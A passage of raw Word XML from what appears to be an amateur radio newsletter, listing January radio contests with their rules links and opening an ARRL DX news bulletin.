              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 15-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B756643" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>UBA PSK63 Prefix Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71E0ED61" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId174" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://bit.ly/2Oi8fsa</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="32C1D7FC" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56F63023" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 15-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DA19943" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>ARRL Jan VHF Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B81846A" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId175" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.arrl.org/january-vhf</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="4066208F" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5187B397" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Jan. 22-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E0187E9" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>BARTG RTTY Sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC7F099" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId176" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://bartg.org.uk/wp/contests</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="348D9F73" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28FBD4E8" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 22-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6023A2A5" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>North American SSB QSOP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52237007" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId177" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://ncjweb.com/naqp</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="4EB34E5B" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="382ACFA0" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D6C0697" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>UKEICC 80 M Contest CW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1445A40D" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId178" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://ukeicc.com/80m-rules.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="1BF3A599" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FD1C569" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Jan. 28-30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8F2A81" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>CQWW 160M CW Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385E7D24" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId179" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://cq160.com/rules.htm</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="283B9DDC" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D24980D" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 29-30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FEA10C7" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>REF CW Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4192650E" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId180" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://tinyurl.com/78z37kdj</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="0B355960" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1223B73F" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 29-30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F39B9CF" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Winter Field Day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649A36CE" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId181" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.winterfieldday.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D10CD7F" w14:textId="77777777" w:rsidR="006A142E" w:rsidRDefault="006A142E" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37470A37" w14:textId="3B5FB2ED" w:rsidR="00ED2B66" w:rsidRDefault="00ED2B66" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61600ADB" w14:textId="3C8D6ED1" w:rsidR="00ED2B66" w:rsidRDefault="00ED2B66" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E11A0D" w14:textId="0EB11B33" w:rsidR="00ED2B66" w:rsidRDefault="00ED2B66" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6D2907" w14:textId="65CBBF8B" w:rsidR="00ED2B66" w:rsidRDefault="00ED2B66" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548014B5" w14:textId="50A73C18" w:rsidR="00ED2B66" w:rsidRDefault="00ED2B66" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB9447A" w14:textId="77777777" w:rsidR="00ED2B66" w:rsidRPr="004D5164" w:rsidRDefault="00ED2B66" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FEA611" w14:textId="5EB2F33B" w:rsidR="00560119" w:rsidRPr="00625D93" w:rsidRDefault="0084211F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="2B281BC5">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:bookmarkStart w:id="30" w:name="special"/>
      <w:bookmarkStart w:id="31" w:name="_Hlk50106919"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1C9381EA" w14:textId="61EBAC6C" w:rsidR="00E12847" w:rsidRDefault="00E12847" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AECE6A3" w14:textId="77777777" w:rsidR="001170F5" w:rsidRDefault="001170F5" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343748A8" w14:textId="77777777" w:rsidR="001170F5" w:rsidRDefault="001170F5" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586031EE" w14:textId="210DD9BE" w:rsidR="00EA3F06" w:rsidRPr="00F02511" w:rsidRDefault="00F02511" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ARLD051 DX news</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This week's bulletin was made possible with information provided by</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The Daily DX, the OPDX Bulletin, 425 DX News, DXNL, INDX, Contest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Corral from QST and the ARRL Contest Calendar and WA7BNM web sites.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Thanks to all.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
